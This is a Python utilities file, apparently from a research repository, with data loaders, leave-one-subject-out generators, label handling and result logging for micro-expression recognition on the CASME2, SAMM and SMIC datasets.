collectinglabel\n# from reordering import readinput\nfrom evaluationmatrix import fpr\nimport itertools\n# from pynvml.pynvml import *\n\nimport tensorflow as tf\nfrom sklearn.decomposition import PCA\nimport imblearn.under_sampling as under_sampling\nimport matplotlib.pyplot as plt\n\ndef read_image(root_dir, db, table):\n\tdata_path = root_dir + db + \"/\" + db + \"/\"\n\timg_list = []\n\tsubj_for_loso = \"\"\n\timg_list_subpartitioning = []\n\n\tlabel_list = []\n\tlabel_list_subpartitioning = []\n\t\n\tfor item in table:\n\n\t\tif 'SAMM' in db:\n\t\t\tsubj = (item[0])[0:3]\n\t\t\tif len(item[0]) < 4:\n\t\t\t\tvid = item[1]\n\t\t\t\tlabel = item[-1]\n\t\t\telse:\n\t\t\t\tvid = item[0]\n\t\t\t\tlabel = item[-1] - 1\n\n\n\n\n\t\telif 'SMIC' in db:\n\t\t\tsubj = (item[0])[1:3]\n\t\t\tif 's' not in subj:\n\t\t\t\tsubj = \"s\" + subj\n\t\t\telse:\n\t\t\t\tsubj = subj\n\n\t\t\tif len(item[0]) < 4:\n\t\t\t\tvid = item[1]\n\t\t\t\tlabel = int(item[-1])\n\t\t\telse:\n\t\t\t\tvid = item[0]\n\t\t\t\tlabel = int(item[-1] - 1)\n\n\n\t\telif 'CASME' in db:\n\t\t\tif 'sub' not in item[0]:\n\t\t\t\tsubj = \"sub\" + item[0]\n\t\t\t\tlabel = item[-1] - 1\n\t\t\telse:\n\t\t\t\tsubj = item[0]\n\t\t\t\tlabel = item[-1]\n\t\t\tvid = item[1]\n\n\t\telif 'ratio' in db:\n\t\t\tif 'sub' not in item[0]:\n\t\t\t\tsubj = \"sub\" + item[0]\n\t\t\t\tlabel = item[-1] - 1\n\t\t\telse:\n\t\t\t\tsubj = item[0]\n\t\t\t\tlabel = item[-1]\n\t\t\tvid = item[1]\n\n\n\t\t# initialization\n\t\tif subj_for_loso == \"\":\n\t\t\tsubj_for_loso = subj\t\n\n\t\t# push in for first and 2nd subj\n\t\tif subj_for_loso != subj and len(img_list_subpartitioning) > 0:\n\n\t\t\tsubj_for_loso = subj\n\t\t\timg_list += [img_list_subpartitioning]\n\t\t\tlabel_list += [label_list_subpartitioning]\n\t\t\timg_list_subpartitioning = []\n\t\t\tlabel_list_subpartitioning = []\n\t\t\t\n\n\t\tfolder_path = data_path + subj + \"/\" + vid + \"/\"\n\t\tfiles = os.listdir(folder_path)\n\t\t\n\t\tfor file in files:\n\n\t\t\ttemp = folder_path + file\n\n\t\t\timg_list_subpartitioning += [temp]\n\t\t\tlabel_list_subpartitioning += [label]\n\t\t\n\t# push in for last subj\n\timg_list += [img_list_subpartitioning]\n\tlabel_list += [label_list_subpartitioning]\n\n\treturn img_list, label_list\n\ndef create_generator_nonLOSO(x, y, classes, net = 'vgg', spatial_size = 224, train_phase=True):\n\t# Note: Test will be done separately from Training\n\n\t# Filter out only Training Images and Labels\n\t\n\t# Read and Yield\n\tX = []\n\tY = []\n\tnon_binarized_Y = []\n\n\tfor subj_counter in range(len(x)):\n\t\t# train case\n\t\tif train_phase:\n\n\t\t\tfor each_file in x[subj_counter]:\n\t\t\t\timage = img.load_img(each_file, target_size=(spatial_size, spatial_size))\n\t\t\t\timage = img.img_to_array(image)\n\t\t\t\timage = np.expand_dims(image, axis=0)\n\t\t\t\tif net == 'res':\n\t\t\t\t\timage = res_preprocess_input(image)\n\t\t\t\telif net == 'vgg':\n\t\t\t\t\timage = preprocess_input(image) # vgg way\n\t\t\t\tX += [image]\n\n\t\t\ttemp_y = np_utils.to_categorical(y[subj_counter], classes)\n\t\t\tfor each_label in temp_y:\n\t\t\t\t# Y.append(each_label)\n\t\t\t\tY += [each_label]\n\n\t\t\tfor item in y[subj_counter]:\n\t\t\t\tnon_binarized_Y += [item]\t\t\t\t\t\n\n\n\tX = np.vstack(X)\n\tY = np.vstack(Y)\n\n\n\tif train_phase:\n\t\t# print(non_binarized_Y)\n\t\tnon_binarized_Y = np.vstack(non_binarized_Y) # for sklearn\n\n\t\tyield X, Y, non_binarized_Y\n\telse:\n\t\tnon_binarized_Y = np.vstack(non_binarized_Y) # for sklearn\n\t\tyield X, Y, non_binarized_Y\n\n\ndef create_generator_LOSO_sequence(x, y, classes, sub, net='vgg', spatial_size=224, train_phase='true', sequence_len = 10):\n\t# Note: Test will be done separately from Training\n\n\t# Filter out only Training Images and Labels\n\t\n\t# Read and Yield\n\tX = []\n\tY = []\n\tnon_binarized_Y = []\n\n\n\tfor subj_counter in range(len(x)):\n\t\t# train case\n\t\tif train_phase == 'true':\n\t\t\tprint(\"TRAIN PHASE TRUE\")\n\t\t\tif subj_counter != sub:\n\t\t\t\tone_frame = []\n\n\t\t\t\tfor each_file in x[subj_counter]:\n\n\t\t\t\t\timage = img.load_img(each_file, target_size=(spatial_size, spatial_size))\n\t\t\t\t\timage = img.img_to_array(image)\n\n\t\t\t\t\timage = np.expand_dims(image, axis=0)\n\t\t\t\t\tif net == 'res':\n\t\t\t\t\t\timage = res_preprocess_input(image)\n\t\t\t\t\telif net == 'vgg':\n\t\t\t\t\t\timage = preprocess_input(image)\n\n\t\t\t\t\tone_frame += [image]\n\n\n\t\t\t\tone_vid = np.stack(one_vid, axis=0)\n\t\t\t\t# print(one_vid.shape)\n\t\t\t\tX += [one_frame]\n\t\t\t\ttemp_y = np_utils.to_categorical(y[subj_counter], classes)\n\t\t\t\tfor each_label in temp_y:\n\t\t\t\t\t# Y.append(each_label)\n\t\t\t\t\tY += [each_label]\n\n\t\t# for svc case\n\t\telif train_phase == 'svc':\n\t\t\tif subj_counter != sub:\n\t\t\t\tone_frame = []\n\t\t\t\tone_vid = []\n\t\t\t\tone_vid_labels = []\n\t\t\t\tseq_counter = 0\n\n\t\t\t\tfor each_vid in x[subj_counter]:\n\n\t\t\t\t\tfor each_file in each_vid:\n\t\t\t\t\t\timage = img.load_img(each_file, target_size=(spatial_size, spatial_size))\n\t\t\t\t\t\timage = img.img_to_array(image)\n\t\t\t\t\t\timage = np.expand_dims(image, axis=0)\n\t\t\t\t\t\tif net == 'res':\n\t\t\t\t\t\t\timage = res_preprocess_input(image)\n\t\t\t\t\t\telif net == 'vgg':\n\t\t\t\t\t\t\timage = preprocess_input(image)\n\t\t\t\t\t\timage = np.transpose(image, (1, 2, 3, 0))\n\n\t\t\t\t\t\tone_vid += [image]\n\t\t\t\t\t\tone_vid_labels += []\n\t\t\t\t\t\tseq_counter += 1\n\n\t\t\t\t\t\t\n\t\t\t\t\t\tif seq_counter / (sequence_len) == 1:\n\t\t\t\t\t\t\tone_vid = np.stack(one_vid, axis = -1)\n\t\t\t\t\t\t\tone_vid = np.reshape(one_vid, (one_vid.shape[0], one_vid.shape[1], one_vid.shape[2], one_vid.shape[-1]))\t\n\t\t\t\t\t\t\tX += [one_vid]\t\t\t\t\t\n\t\t\t\t\t\t\tone_vid = []\n\t\t\t\t\t\t\tone_vid_labels = []\n\t\t\t\t\t\t\tseq_counter = 0\n\t\t\t\t\t\t\t# print(one_vid)\n\t\t\t\t\t\t\t\t\t\t\n\n\n\t\t\t\t\ttemp_y = np_utils.to_categorical(y[subj_counter], classes)\n\t\t\t\t\t# non_binarized_Y += [y[subj_counter]]\n\n\t\t\t\tfor item in y[subj_counter]:\n\t\t\t\t\tnon_binarized_Y += [item]\n\n\t\t\t\tfor each_label in temp_y:\n\t\t\t\t\tY += [each_label]\t\t\t\n\n\n\t\t# test case\n\t\telse:\n\t\t\tif subj_counter == sub:\n\t\t\t\tone_frame = []\n\t\t\t\tone_vid = []\n\t\t\t\tseq_counter = 0\n\n\t\t\t\tfor each_vid in x[subj_counter]:\n\t\t\t\t\tfor each_file in each_vid:\n\t\t\t\t\t\timage = img.load_img(each_file, target_size=(spatial_size, spatial_size))\n\t\t\t\t\t\t# print(image)\n\t\t\t\t\t\timage = img.img_to_array(image)\n\t\t\t\t\t\timage = np.expand_dims(image, axis=0)\n\t\t\t\t\t\tif net == 'res':\n\t\t\t\t\t\t\timage = res_preprocess_input(image)\n\t\t\t\t\t\telif net == 'vgg':\n\t\t\t\t\t\t\timage = preprocess_input(image)\n\t\t\t\t\t\timage = np.transpose(image, (1, 2, 3, 0))\n\n\t\t\t\t\t\tone_vid += [image]\n\t\t\t\t\t\tseq_counter += 1\n\t\t\t\t\t\t\n\t\t\t\t\t\tif seq_counter / (sequence_len) == 1:\n\t\t\t\t\t\t\tone_vid = np.stack(one_vid, axis = -1)\n\t\t\t\t\t\t\tone_vid = np.reshape(one_vid, (one_vid.shape[0], one_vid.shape[1], one_vid.shape[2], one_vid.shape[-1]))\t\n\t\t\t\t\t\t\t# print(one_vid.shape)\n\t\t\t\t\t\t\tX += [one_vid]\t\t\t\t\t\n\t\t\t\t\t\t\tone_vid = []\n\t\t\t\t\t\t\tseq_counter = 0\n\t\t\t\t\t\t\t# print(one_vid)\n\n\n\n\t\t\t\t\t# one_vid = np.stack(one_vid, axis = -1)\n\t\t\t\t\t# one_vid = np.reshape(one_vid, (one_vid.shape[0], one_vid.shape[1], one_vid.shape[2], one_vid.shape[-1]))\t\n\t\t\t\t\t# X += [one_vid]\t\n\n\t\t\t\t# temp_y = np_utils.to_categorical(y[subj_counter], classes)\n\t\t\t\t# for each_label in temp_y:\n\t\t\t\t# \t# Y.append(each_label)\n\t\t\t\t# \tY += [each_label]\t\t\t\n\t\t\t\t# \tnon_binarized_Y += [y[subj_counter]]\n\t\t\t\t\ttemp_y = np_utils.to_categorical(y[subj_counter], classes)\n\n\t\t\t\tfor item in y[subj_counter]:\n\t\t\t\t\tnon_binarized_Y += [item]\n\n\t\t\t\tfor each_label in temp_y:\n\t\t\t\t\tY += [each_label]\t\t\t\t\t\t\t\n\n\n\tX = np.asarray(X)\n\tX = np.rollaxis(X, axis=4, start=1)\n\t# print(X)\n\t# print(X.shape)\n\n\n\tY = np.vstack(Y)\n\t# Y = Y[::sequence_len]\n\ty = np.asarray(Y)\n\t# non_binarized_Y = non_binarized_Y[::sequence_len]\n\tnon_binarized_Y = np.asarray(non_binarized_Y)\n\t# print(X.shape)\n\t# print(y)\n\t# print(y.shape)\n\t# print(non_binarized_Y)\n\t# print(non_binarized_Y.shape)\n\n\tif train_phase == 'true':\n\t\tyield X, Y\n\telif train_phase == 'svc':\n\t\tyield X, Y, non_binarized_Y\n\telse:\n\t\tnon_binarized_Y = np.vstack(non_binarized_Y) # for sklearn\n\t\tyield X, Y, non_binarized_Y\n\n\ndef create_generator_LOSO_image_cutting_augmentation(x, y, classes, sub, net='vgg', spatial_size=224, train_phase='true'):\n\t# Note: Test will be done separately from Training\n\n\t# Filter out only Training Images and Labels\n\n\t# Read and Yield\n\tX = []\n\tY = []\n\tnon_binarized_Y = []\n\n\tfor subj_counter in range(len(x)):\n\n\t\tif train_phase == 'svc':\n\t\t\tif subj_counter != sub:\n\t\t\t\tfor file_counter in range(len(x[subj_counter])):\n\t\t\t\t\teach_file = (x[subj_counter])[file_counter]\n\t\t\t\t\timage = img.load_img(each_file, target_size=(spatial_size, spatial_size))\n\t\t\t\t\timage = img.img_to_array(image)\n\n\t\t\t\t\timage = np.expand_dims(image, axis=0)\n\n\t\t\t\t\t# codes for augmentation\n\t\t\t\t\taug_img_arr = cut_algorithm_call_all(cut_interval=[2, 4], spatial_size=spatial_size, img=image)\n\t\t\t\t\t\n\t\t\t\t\tfor single_img in aug_img_arr:\n\t\t\t\t\t\tif net == 'res':\n\t\t\t\t\t\t\timage = res_preprocess_input(single_img)\n\t\t\t\t\t\telif net == 'vgg':\n\t\t\t\t\t\t\timage = preprocess_input(single_img)\n\t\t\t\t\t\tX += [image]\n\n\t\t\t\t\t\ttemp_y = np_utils.to_categorical(y[subj_counter], classes)\n\t\t\t\t\t\tnon_binarized_Y += [ (y[subj_counter])[file_counter] ]\n\t\t\t\t\t\tY += [temp_y[file_counter]]\n\n\t\t\n\n\t\t# test case\n\t\telse:\n\t\t\tif subj_counter == sub:\n\t\t\t\t# print(x)\n\t\t\t\tfor each_file in x[subj_counter]:\n\n\t\t\t\t\timage = img.load_img(each_file, target_size=(spatial_size, spatial_size))\n\t\t\t\t\t# print(image)\n\t\t\t\t\timage = img.img_to_array(image)\n\t\t\t\t\timage = np.expand_dims(image, axis=0)\n\t\t\t\t\tif net == 'res':\n\t\t\t\t\t\timage = res_preprocess_input(image)\n\t\t\t\t\telif net == 'vgg':\n\t\t\t\t\t\timage = preprocess_input(image)\n\t\t\t\t\tX += [image]\n\n\t\t\t\ttemp_y = np_utils.to_categorical(y[subj_counter], classes)\n\t\t\t\tfor each_label in temp_y:\n\t\t\t\t\tY += [each_label]\t\t\t\n\t\t\t\t\tnon_binarized_Y += [y[subj_counter]]\n\n\tX = np.vstack(X)\n\tY = np.vstack(Y)\n\n\tif train_phase == 'svc':\n\t\tyield X, Y, non_binarized_Y\n\telse:\n\t\tnon_binarized_Y = np.vstack(non_binarized_Y) # for sklearn\n\t\tyield X, Y, non_binarized_Y\n\n\ndef create_generator_LOSO(x, y, classes, sub, net='vgg', spatial_size=224, train_phase='true'):\n\t# Note: Test will be done separately from Training\n\n\t# Filter out only Training Images and Labels\n\n\t# Read and Yield\n\tX = []\n\tY = []\n\tnon_binarized_Y = []\n\n\tfor subj_counter in range(len(x)):\n\n\t\tif train_phase == 'svc':\n\t\t\tif subj_counter != sub:\n\t\t\t\tfor each_file in x[subj_counter]:\n\n\t\t\t\t\timage = img.load_img(each_file, target_size=(spatial_size, spatial_size))\n\t\t\t\t\timage = img.img_to_array(image)\n\t\t\t\t\timage = np.expand_dims(image, axis=0)\n\t\t\t\t\tif net == 'res':\n\t\t\t\t\t\timage = res_preprocess_input(image)\n\t\t\t\t\telif net == 'vgg':\n\t\t\t\t\t\timage = preprocess_input(image)\n\t\t\t\t\tX += [image]\n\n\t\t\t\ttemp_y = np_utils.to_categorical(y[subj_counter], classes)\n\n\t\t\t\tfor item in y[subj_counter]:\n\t\t\t\t\tnon_binarized_Y += [item]\n\n\t\t\t\tfor each_label in temp_y:\n\t\t\t\t\tY += [each_label]\t\t\t\n\n\t\t# test case\n\t\telse:\n\t\t\tif subj_counter == sub:\n\t\t\t\t# print(x)\n\t\t\t\tfor each_file in x[subj_counter]:\n\n\t\t\t\t\timage = img.load_img(each_file, target_size=(spatial_size, spatial_size))\n\t\t\t\t\t# print(image)\n\t\t\t\t\timage = img.img_to_array(image)\n\t\t\t\t\timage = np.expand_dims(image, axis=0)\n\t\t\t\t\tif net == 'res':\n\t\t\t\t\t\timage = res_preprocess_input(image)\n\t\t\t\t\telif net == 'vgg':\n\t\t\t\t\t\timage = preprocess_input(image)\n\t\t\t\t\tX += [image]\n\n\t\t\t\ttemp_y = np_utils.to_categorical(y[subj_counter], classes)\n\t\t\t\tfor each_label in temp_y:\n\t\t\t\t\tY += [each_label]\t\t\t\n\t\t\t\t\tnon_binarized_Y += [y[subj_counter]]\n\n\tX = np.vstack(X)\n\tY = np.vstack(Y)\n\n\tif train_phase == 'svc':\n\t\tyield X, Y, non_binarized_Y\n\telse:\n\t\tnon_binarized_Y = np.vstack(non_binarized_Y) # for sklearn\n\t\tyield X, Y, non_binarized_Y\n\n\ndef data_loader_with_LOSO(subject, SubjectPerDatabase, y_labels, subjects, classes):\n\tTrain_X = []\n\tTrain_Y = []\n\n\n\tTest_X = np.array(SubjectPerDatabase[subject])\n\tTest_Y = np_utils.to_categorical(y_labels[subject], classes)\n\tTest_Y_gt = y_labels[subject]\n\n\t########### Leave-One-Subject-Out ###############\n\tif subject==0:\n\t\tfor i in range(1,subjects):\n\t\t\tTrain_X.append(SubjectPerDatabase[i])\n\t\t\tTrain_Y.append(y_labels[i])\n\telif subject==subjects-1:\n\t\tfor i in range(subjects-1):\n\t\t\tTrain_X.append(SubjectPerDatabase[i])\n\t\t\tTrain_Y.append(y_labels[i])\n\telse:\n\t\tfor i in range(subjects):\n\t\t\tif subject == i:\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tTrain_X.append(SubjectPerDatabase[i])\n\t\t\t\tTrain_Y.append(y_labels[i])\t\n\t##################################################\n\n\n\t############ Conversion to numpy and stacking ###############\n\tTrain_X=np.vstack(Train_X)\n\tTrain_Y=np.hstack(Train_Y)\n\tTrain_Y=np_utils.to_categorical(Train_Y, classes)\n\t#############################################################\n\n\treturn Train_X, Train_Y, Test_X, Test_Y, Test_Y_gt\n\n\ndef duplicate_channel(X):\n\n\tX = np.repeat(X, 3, axis=3)\n\t# np.set_printoptions(threshold=np.nan)\n\t# print(X)\n\tprint(X.shape)\n\n\treturn X\n\ndef record_scores(workplace, dB, ct, sub, order, tot_mat, n_exp, subjects):\n\tif not os.path.exists(workplace+'Classification/'+'Result/'+dB+'/'):\n\t\tos.mkdir(workplace+'Classification/'+ 'Result/'+dB+'/')\n\t\t\n\twith open(workplace+'Classification/'+ 'Result/'+dB+'/sub_CT.txt','a') as csvfile:\n\t\t\tthewriter=csv.writer(csvfile, delimiter=' ')\n\t\t\tthewriter.writerow('Sub ' + str(sub+1))\n\t\t\tthewriter=csv.writer(csvfile,dialect=csv.excel_tab)\n\t\t\tfor row in ct:\n\t\t\t\tthewriter.writerow(row)\n\t\t\tthewriter.writerow(order)\n\t\t\tthewriter.writerow('\\n')\n\t\t\t\n\tif sub==subjects-1:\n\t\t\t# compute the accuracy, F1, P and R from the overall CT\n\t\t\tmicroAcc=np.trace(tot_mat)/np.sum(tot_mat)\n\t\t\t[f1,p,r]=fpr(tot_mat,n_exp)\n\t\t\tprint(tot_mat)\n\t\t\tprint(\"F1-Score: \" + str(f1))\n\t\t\t# save into a .txt file\n\t\t\twith open(workplace+'Classification/'+ 'Result/'+dB+'/final_CT.txt','w') as csvfile:\n\t\t\t\tthewriter=csv.writer(csvfile,dialect=csv.excel_tab)\n\t\t\t\tfor row in tot_mat:\n\t\t\t\t\tthewriter.writerow(row)\n\t\t\t\t\t\n\t\t\t\tthewriter=csv.writer(csvfile, delimiter=' ')\n\t\t\t\tthewriter.writerow('micro:' + str(microAcc))\n\t\t\t\tthewriter.writerow('F1:' + str(f1))\n\t\t\t\tthewriter.writerow('Precision:' + str(p))\n\t\t\t\tthewriter.writerow('Recall:' + str(r))\t\t\t\n\ndef loading_smic_labels(root_db_path, dB):\n\n\tlabel_filename = \"SMIC_label.xlsx\"\n\n\tlabel_path = root_db_path + dB + \"/\" + label_filename\n\tlabel_file = pd.read_excel(label_path)\n\tlabel_file = label_file.dropna()\n\n\tsubject = label_file[['Subject']]\n\tfilename = label_file[['Filename']]\n\tlabel = label_file[['Label']]\n\tnum_frames = label_file[['Frames']]\n\n\t# print(label_file)\n\treturn subject, filename, label, num_frames\n\ndef loading_samm_labels(root_db_path, dB, objective_flag):\n\tlabel_filename = 'SAMM_Micro_FACS_Codes_v2.xlsx'\n\n\tlabel_path = root_db_path + dB + \"/\" + label_filename\n\tlabel_file = pd.read_excel(label_path, converters={'Subject': lambda x: str(x)})\n\t# remove class 6, 7\n\t# if objective_flag:\n\t\t# print(objective_flag)\n\t\t# label_file = label_file.ix[label_file['Objective Classes'] < 6]\n\n\tsubject = label_file[['Subject']]\n\tfilename = label_file[['Filename']]\n\tlabel = label_file[['Estimated Emotion']]\n\tobjective_classes = label_file[['Objective Classes']]\n\n\treturn subject, filename, label, objective_classes\n\ndef loading_casme_labels(root_db_path, dB):\n\tlabel_filename = 'CASME2_label_Ver_2.xls'\n\n\tlabel_path = root_db_path + dB + \"/\" + label_filename\n\t# print(label_path)\n\tlabel_file = pd.read_excel(label_path, converters={'Subject': lambda x: str(x)})\n\n\t# remove class others\n\t# label_file = label_file.ix[label_file['Objective Class'] < 6]\n\t# print(len(label_file)) # 185 samples\n\n\tsubject = label_file[['Subject']]\n\tfilename = label_file[['Filename']]\n\texpression_classes = label_file[['Estimated Emotion']]\n\n\treturn subject, filename, expression_classes\n\n\ndef loading_casme_table(root_db_path, dB):\n\tsubject, filename, expression_classes = loading_casme_labels(root_db_path, dB)\n\t\n\tsubject = subject.values\n\tfilename = filename.values\n\texpression_classes = expression_classes.values\n\n\ttable = np.transpose( np.array( [subject, filename, expression_classes] ) )\n\n\treturn table\n\n\n\ndef loading_smic_table(root_db_path, dB):\n\tsubject, filename, label, num_frames = loading_smic_labels(root_db_path, dB)\n\tfilename = filename.values\n\tlabel = label.values\n\n\ttable = np.transpose( np.array( [filename, label] ) )\t\n\treturn table\t\n\n\ndef loading_samm_table(root_db_path, dB, objective_flag):\t\n\tsubject, filename, label, objective_classes = loading_samm_labels(root_db_path, dB, objective_flag)\n\t# print(\"subject:%s filename:%s label:%s objective_classes:%s\" %(subject, filename, label, objective_classes))\n\tsubject = subject.values\n\tfilename = filename.values\n\tlabel = label.values\n\tobjective_classes = objective_classes.values\n\ttable = np.transpose( np.array( [filename, label] ) )\n\ttable_objective = np.transpose( np.array( [subject, filename, objective_classes] ) )\n\t# print(table)\n\treturn table, table_objective\n\n\n\nclass LossHistory(keras.callbacks.Callback):\n\tdef on_train_begin(self, logs={}):\n\t\tself.losses = []\n\t\tself.accuracy = []\n\t\tself.epochs = []\n\tdef on_epoch_end(self, epoch, logs={}):\n\t\tself.losses.append(logs.get('loss'))\n\t\tself.accuracy.append(logs.get('activation_1_categorical_accuracy'))\t\t\n\t\t# self.accuracy.append(logs.get('categorical_accuracy'))\n\t\tself.epochs.append(logs.get('epochs'))\n\n\n\ndef record_loss_accuracy(db_home, train_id, db, history_callback):\n\tfile_loss = open(db_home + 'Classification/' + 'Result/' + db + '/loss_' + str(train_id) + '.txt', 'a')\n\tfile_loss.write(str(history_callback.losses) + \"\\n\")\n\tfile_loss.close()\n\n\tfile_loss = open(db_home + 'Classification/' + 'Result/' + db + '/accuracy_' + str(train_id) + '.txt', 'a')\n\tfile_loss.write(str(history_callback.accuracy) + \"\\n\")\n\tfile_loss.close()\t\n\n\tfile_loss = open(db_home + 'Classification/' + 'Result/'+ db + '/epoch_' + str(train_id) + '.txt', 'a')\n\tfile_loss.write(str(history_callback.epochs) + \"\\n\")\n\tfile_loss.close()\t\t\n\ndef epoch_analysis(db_home, train_id, db, f1, war, uar, macro_f1, weighted_f1, loss):\n\n\tresult_folder = db_home + 'Classification/' + 'Result/' + db + '/' + str(train_id) + '/'\n\tif os.path.isdir(result_folder) == False:\n\t\tos.mkdir(result_folder)\n\n\tfile_loss = open(result_folder + 'microf1_' + str(train_id) + '.txt', 'a')\n\tfile_loss.write(str(f1) + \"\\n\")\n\tfile_loss.close()\n\n\tfile_loss = open(result_folder + 'war_' + str(train_id) + '.txt', 'a')\n\tfile_loss.write(str(war) + \"\\n\")\n\tfile_loss.close()\t\n\n\tfile_loss = open(result_folder + 'uar_' + str(train_id) + '.txt', 'a')\n\tfile_loss.write(str(uar) + \"\\n\")\n\tfile_loss.close()\t\n\n\tfile_loss = open(result_folder + 'macrof1_' + str(train_id) + '.txt', 'a')\n\tfile_loss.write(str(macro_f1) + \"\\n\")\n\tfile_loss.close()\t\n\n\tfile_loss = open(result_folder + 'weightedf1_' + str(train_id) + '.txt', 'a')\n\tfile_loss.write(str(weighted_f1) + \"\\n\")\n\tfile_loss.close()\t\n\n\tfile_loss = open(result_folder + 'losses_' + str(train_id) + '.txt', 'a')\n\tfile_loss.write(str(loss) + \"\\n\")\n\tfile_loss.close()\t\n\ndef sanity_check_image(X, channel, spatial_size):\n\t# item = X[0,:,:,:]\n\titem = X[0, :, :, 0]\n\n\titem = item.reshape(224, 224, channel)\n\n\tcv2.imwrite('sanity_check.png', item)\n\n\n\ndef class_merging(table):\n\tneg = ['repression', 'disgust', 'anger', 'contempt', 'fear', 'sadness']\n\tpos = ['happiness']\n\tother = ['other', 'others']\n\trows_to_remove = []\n\ttable = table[0]\n\n\tfor counter in range(len(table)):\n\t\titem = table[counter]\n\t\titem[-1] = item[-1].lower()\n\t\tif item[-1] in neg:\n\t\t\ttable[counter, -1] = 1\n\t\telif item[-1] in pos:\n\t\t\ttable[counter, -1] = 2\n\t\telif item[-1] == 'surprise':\n\t\t\ttable[counter, -1] = 3\n\t\telif item[-1] in other:\n\t\t\trows_to_remove += [counter]\n\n\ttable = np.delete(table, rows_to_remove, 0)\n\t# print(table)\n\n\treturn table\n\ndef class_discretization(table, db='CASME_2'):\n\t# neg = ['repression', 'disgust', 'anger', 'contempt', 'fear', 'sadness']\n\t# pos = ['happiness']\n\t# other = ['other', 'others']\n\trows_to_remove = []\n\ttable = table[0]\n\n\tif 'CASME' in db:\n\t\tfor counter in range(len(table)):\n\t\t\titem = table[counter]\n\t\t\titem[-1] = item[-1].lower()\n\t\t\tif item[-1] == 'happiness':\n\t\t\t\ttable[counter, -1] = 1\n\t\t\telif item[-1] == 'disgust':\n\t\t\t\ttable[counter, -1] = 2\n\t\t\telif item[-1] == 'repression':\n\t\t\t\ttable[counter, -1] = 3\n\t\t\telif item[-1] == 'surprise':\n\t\t\t\ttable[counter, -1] = 4\n\t\t\telif item[-1] == 'others':\n\t\t\t\ttable[counter, -1] = 5\n\t\t\telif item[-1] == 'fear' or item[-1] == 'sadness':\n\t\t\t\trows_to_remove += [counter]\t\t\n\t\ttable = np.delete(table, rows_to_remove, 0)\t\n\n\telif 'SAMM' in db:\n\t\tfor counter in range(len(table)):\n\t\t\titem = table[counter]\n\t\t\titem[-1] = item[-1].lower()\n\t\t\tif item[-1] == 'anger':\n\t\t\t\ttable[counter, -1] = 1\n\t\t\telif item[-1] == 'happiness':\n\t\t\t\ttable[counter, -1] = 2\n\t\t\telif item[-1] == 'contempt':\n\t\t\t\ttable[counter, -1] = 3\t\n\t\t\telif item[-1] == 'surprise':\n\t\t\t\ttable[counter, -1] = 4\t\n\t\t\telif item[-1] == 'other':\n\t\t\t\ttable[counter, -1] = 5\n\t\t\telif item[-1] == 'sadness' or item[-1] == 'fear' or item[-1] == 'disgust':\n\t\t\t\trows_to_remove += [counter]\n\t\ttable = np.delete(table, rows_to_remove, 0)\t\n\n\t# table = np.delete(table, rows_to_remove, 0)\n\t# print(table)\n\n\treturn table\n\ndef reverse_discretization(label, db='CASME'):\n\tif 'CASME' in db:\n\t\tif label == 0:\n\t\t\tlabel = 'happiness'\n\t\telif label == 1:\n\t\t\tlabel = 'disgust'\n\t\telif label == 2:\n\t\t\tlabel = 'repression'\n\t\telif label == 3:\n\t\t\tlabel = 'surprise'\n\t\telif label == 4:\n\t\t\tlabel = 'others'\t\t\t\t\t\t\t\t\t\n\n\treturn label\n\ndef load_combined_labels(path):\n\tpath = path + 'combined_3dbs.csv'\n\ttable = pd.read_table(path, sep=',', header=None, names=['db', 'sub', 'vid', 'class'])\n\t\n\n\ttable = table.values\n\n\tpivoting = [0]\n\tcurr_db = table[0][0]\n\tfor counter in range(len(table)):\n\t\tdb = table[counter][0]\n\t\tif db != curr_db:\n\t\t\tpivoting += [counter]\n\t\t\tcurr_db = db\n\t# print(len(table))\n\n\ttable = np.delete(table, 0, axis=1)\n\t### HARD SEQUENCE: CASME --> SMIC --> SAMM\n\tcasme_table = table[pivoting[0]:pivoting[1], :]\n\tsmic_table = table[pivoting[1]:pivoting[2], :]\n\tsamm_table = table[pivoting[2]:, :]\n\n\n\treturn casme_table, samm_table, smic_table\n\n\ndef compute_distribution(X):\n\n\t# initialize under-sampler\n\t# to be done\n\n\t# vectorize X array\n\tX = np.reshape(X, (X.shape[0], X.shape[1] * X.shape[2] * X.shape[3]))\n\n\t# normalize the distribution to range of [0, 1]\n\tX = ( (X - np.amin(X)) / (np.amax(X) - np.amin(X)) )\n\tprint(X)\n\tprint(X.shape)\n\n\t# # channel by channel pca\n\t# X_B = X\n\t# X_G\n\t# X_R\n\n\tnumber_of_samples_X = X.shape[0]\n\tpca = PCA(n_components=2)\n\trand_X_test = pca.fit_transform(X)\n\tprint(rand_X_test)\n\tprint(rand_X_test.shape)\n\tpca_X = []\n\tfor item in X:\n\t\titem = item.reshape((1, -1))\n\t\titem = pca.fit_transform(item)\n\t\tpca_X += [item]\n\tX = np.vstack(pca_X)\n\tprint(X.shape)\n\n\tdistrib_X = tf.random.categorical(logits = X, num_samples=number_of_samples_X)\n\tprint(distrib_X)\n\tprint(distrib_X.shape)\n\n\treturn distrib_X\n\n\ndef compute_distribution_OS(X):\n\t# initialize PCA\n\t# 24 components\n\tpca_components = 24\n\tpca = PCA(n_components=pca_components)\n\n\t# since it's OS with only b & w strands, we can just take the first channel\n\tX = X[:, 0, :, :]\n\n\tpca_X = []\n\tpca_y = []\n\n\t# index and reshape\n\tx_dim = X[:, :, 0]\n\ty_dim = X[:, 0, :]\n\n\t# apply pca\n\tdim_reduce_X = pca.fit_transform(x_dim)\n\tdim_reduce_y = pca.fit_transform(y_dim)\n\n\t# normalization\n\tdim_reduce_X = ( (dim_reduce_X - np.amin(dim_reduce_X)) / (np.amax(dim_reduce_X) - np.amin(dim_reduce_X)) )\n\tdim_reduce_y = ( (dim_reduce_y - np.amin(dim_reduce_y)) / (np.amax(dim_reduce_y) - np.amin(dim_reduce_y)) )\n\n\n\t# # draw distribution for each normalized logits\n\t# distrib_X = tf.random.categorical(logits = dim_reduce_X, num_samples=dim_reduce_X.shape[1])\n\t# distrib_y = tf.random.categorical(logits = dim_reduce_y, num_samples=dim_reduce_y.shape[1])\n\n\tdistrib_X = dim_reduce_X\n\tdistrib_y = dim_reduce_y\n\n\treturn distrib_X, distrib_y\t","repo_name":"IcedDoggie/ME_Autoencoders","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":23861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71346051620","text":"from config import *\nfrom sklearn.metrics import accuracy_score, f1_score, confusion_matrix, cohen_kappa_score, roc_auc_score\nimport numpy as np\nfrom utils import 